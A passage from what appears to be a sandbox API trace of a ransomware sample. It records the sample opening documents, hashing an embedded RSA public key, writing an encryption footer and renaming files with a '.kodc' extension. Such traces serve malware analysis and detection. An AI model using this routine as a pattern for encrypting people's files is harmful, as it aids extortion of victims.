dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0098.554] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=3298) returned 1 [0098.554] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0098.558] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xcbc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.558] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0098.559] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.559] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0xce2, lpOverlapped=0x0) returned 1 [0098.559] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.559] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0098.559] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.559] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.559] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x692d18) returned 1 [0098.560] CryptCreateHash (in: hProv=0x692d18, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0098.560] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0098.560] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0098.560] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0098.560] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0098.560] GetLastError () returned 0x0 [0098.560] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0098.560] CryptReleaseContext (hProv=0x692d18, dwFlags=0x0) returned 1 [0098.560] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.560] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0098.560] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0098.560] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.560] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0098.560] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.561] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.561] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xce0) returned 0x9b91b28 [0098.561] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0098.561] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.561] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0098.561] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.561] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0098.561] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0098.561] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d2e8 [0098.561] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aa60 [0098.561] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d330 [0098.561] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aa78 [0098.561] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aaa8 [0098.561] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0098.561] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aac0 [0098.561] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0098.561] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0098.561] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0098.561] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0098.561] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aaa8 | out: hHeap=0x630000) returned 1 [0098.561] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aac0 | out: hHeap=0x630000) returned 1 [0098.561] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0098.561] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0098.561] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0098.561] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0098.561] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32ceca0 [0098.561] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331aac0 [0098.562] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0098.562] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331aaa8 [0098.562] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecc0 [0098.562] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c658 [0098.562] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0098.562] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0098.562] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0098.562] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c770 [0098.562] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0098.562] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0098.562] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0098.562] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aac0 | out: hHeap=0x630000) returned 1 [0098.562] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.562] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aaa8 | out: hHeap=0x630000) returned 1 [0098.562] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0098.562] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0098.562] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0098.562] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0098.562] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0098.562] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.562] GetCurrentThreadId () returned 0x42c [0098.562] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0098.562] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9b8f118 [0098.562] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0098.562] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.562] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0098.562] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0098.562] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.562] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0098.563] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.563] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.563] GetCurrentThreadId () returned 0x42c [0098.563] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.563] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.563] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0098.563] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.563] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.563] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.563] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.563] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0098.563] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0098.563] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0098.563] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318ea0 [0098.563] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0098.563] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0098.563] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.563] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0098.563] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.563] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.563] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0098.563] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0098.563] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0098.563] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0098.563] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0098.563] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.563] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aaa8 [0098.563] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0098.563] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0098.564] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.564] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.564] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0098.564] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0098.564] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0098.564] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aac0 [0098.564] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0098.564] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xce2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.564] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0098.564] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0098.564] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0098.564] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0098.564] CloseHandle (hObject=0x5cc) returned 1 [0098.565] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PGbnRpgVWp-kAm_f2.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pgbnrpgvwp-kam_f2.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PGbnRpgVWp-kAm_f2.xlsx.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pgbnrpgvwp-kam_f2.xlsx.kodc")) returned 1 [0098.566] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0098.566] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.566] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.568] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c0 | out: hHeap=0x630000) returned 1 [0098.568] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe03b16a0, ftCreationTime.dwHighDateTime=0x1d5a6c3, ftLastAccessTime.dwLowDateTime=0xa5b73f30, ftLastAccessTime.dwHighDateTime=0x1d59b70, ftLastWriteTime.dwLowDateTime=0xa5b73f30, ftLastWriteTime.dwHighDateTime=0x1d59b70, nFileSizeHigh=0x0, nFileSizeLow=0x6f3b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PPuq-6TBJx4FV5.docx", cAlternateFileName="PPUQ-6~1.DOC")) returned 1 [0098.568] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PPuq-6TBJx4FV5.docx") returned=".docx" [0098.568] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PPuq-6TBJx4FV5.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ppuq-6tbjx4fv5.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0098.568] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=28475) returned 1 [0098.568] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0098.573] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x6f15, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.573] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0098.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.574] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.574] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.574] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x6f3b, lpOverlapped=0x0) returned 1 [0098.574] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0098.574] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.574] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.574] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x692d18) returned 1 [0098.575] CryptCreateHash (in: hProv=0x692d18, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0098.575] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0098.575] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0098.576] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0098.576] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0098.576] GetLastError () returned 0x0 [0098.576] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0098.576] CryptReleaseContext (hProv=0x692d18, dwFlags=0x0) returned 1 [0098.576] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.576] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0098.576] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0098.576] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.576] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0098.576] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.576] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.576] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x6f40) returned 0x9ba4d90 [0098.576] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0098.576] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.576] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0098.576] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.576] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0098.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0098.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d330 [0098.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aa78 [0098.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d378 [0098.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aa90 [0098.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aac0 [0098.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0098.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aad8 [0098.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0098.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0098.577] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0098.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333a888 [0098.577] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aac0 | out: hHeap=0x630000) returned 1 [0098.577] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aad8 | out: hHeap=0x630000) returned 1 [0098.577] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0098.577] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0098.577] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0098.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0098.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec00 [0098.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331aad8 [0098.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0098.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, 